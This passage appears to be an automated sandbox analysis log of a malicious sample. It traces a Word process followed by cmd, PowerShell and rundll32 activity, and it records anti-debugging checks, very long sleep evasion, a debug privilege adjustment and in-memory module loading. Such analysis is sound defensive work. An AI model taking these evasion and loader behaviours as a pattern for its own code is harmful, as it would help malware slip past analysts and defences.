Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2512

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100272AB FindFirstFileExW,FindNextFileW,FindClose,	7_2_100272AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10026EEF FindFirstFileExW,	7_2_10026EEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100272AB FindFirstFileExW,FindNextFileW,FindClose,	8_2_100272AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10026EEF FindFirstFileExW,	8_2_10026EEF

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000005.00000002.2086069397.0000000000244000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10001E91 Control_RunDLL,LoadLibraryA,LoadLibraryA,LoadLibraryA,_strlen,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrAccessResource,WriteFileGather,VirtualAlloc,MessageBoxA,

7_2_10001E91

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1003B720 IsDebuggerPresent,

7_2_1003B720

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10026594 mov eax, dword ptr fs:[00000030h]	7_2_10026594
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100265D7 mov eax, dword ptr fs:[00000030h]	7_2_100265D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1002661A mov eax, dword ptr fs:[00000030h]	7_2_1002661A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001065E mov eax, dword ptr fs:[00000030h]	7_2_1001065E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10026675 mov eax, dword ptr fs:[00000030h]	7_2_10026675
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100106EC mov ecx, dword ptr fs:[00000030h]	7_2_100106EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1002673B mov eax, dword ptr fs:[00000030h]	7_2_1002673B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1002677F mov eax, dword ptr fs:[00000030h]	7_2_1002677F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100267C3 mov eax, dword ptr fs:[00000030h]	7_2_100267C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100267F4 mov eax, dword ptr fs:[00000030h]	7_2_100267F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020C4FF mov eax, dword ptr fs:[00000030h]	7_2_0020C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10026594 mov eax, dword ptr fs:[00000030h]	8_2_10026594
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100265D7 mov eax, dword ptr fs:[00000030h]	8_2_100265D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1002661A mov eax, dword ptr fs:[00000030h]	8_2_1002661A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001065E mov eax, dword ptr fs:[00000030h]	8_2_1001065E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10026675 mov eax, dword ptr fs:[00000030h]	8_2_10026675
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100106EC mov ecx, dword ptr fs:[00000030h]	8_2_100106EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1002673B mov eax, dword ptr fs:[00000030h]	8_2_1002673B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1002677F mov eax, dword ptr fs:[00000030h]	8_2_1002677F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100267C3 mov eax, dword ptr fs:[00000030h]	8_2_100267C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100267F4 mov eax, dword ptr fs:[00000030h]	8_2_100267F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018C4FF mov eax, dword ptr fs:[00000030h]	8_2_0018C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CC4FF mov eax, dword ptr fs:[00000030h]	9_2_001CC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0025C4FF mov eax, dword ptr fs:[00000030h]	10_2_0025C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002CC4FF mov eax, dword ptr fs:[00000030h]	11_2_002CC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001BC4FF mov eax, dword ptr fs:[00000030h]	12_2_001BC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001CC4FF mov eax, dword ptr fs:[00000030h]	13_2_001CC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0039C4FF mov eax, dword ptr fs:[00000030h]	14_2_0039C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0027C4FF mov eax, dword ptr fs:[00000030h]	15_2_0027C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0030C4FF mov eax, dword ptr fs:[00000030h]	16_2_0030C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_2_0015C4FF mov eax, dword ptr fs:[00000030h]	17_2_0015C4FF

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1000288D GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,VirtualAlloc,und_memcpy,SetLastError,SetLastError,

7_2_1000288D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10003EE0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_10003EE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004076 SetUnhandledExceptionFilter,	7_2_10004076
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000E144 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_1000E144
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004171 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_10004171
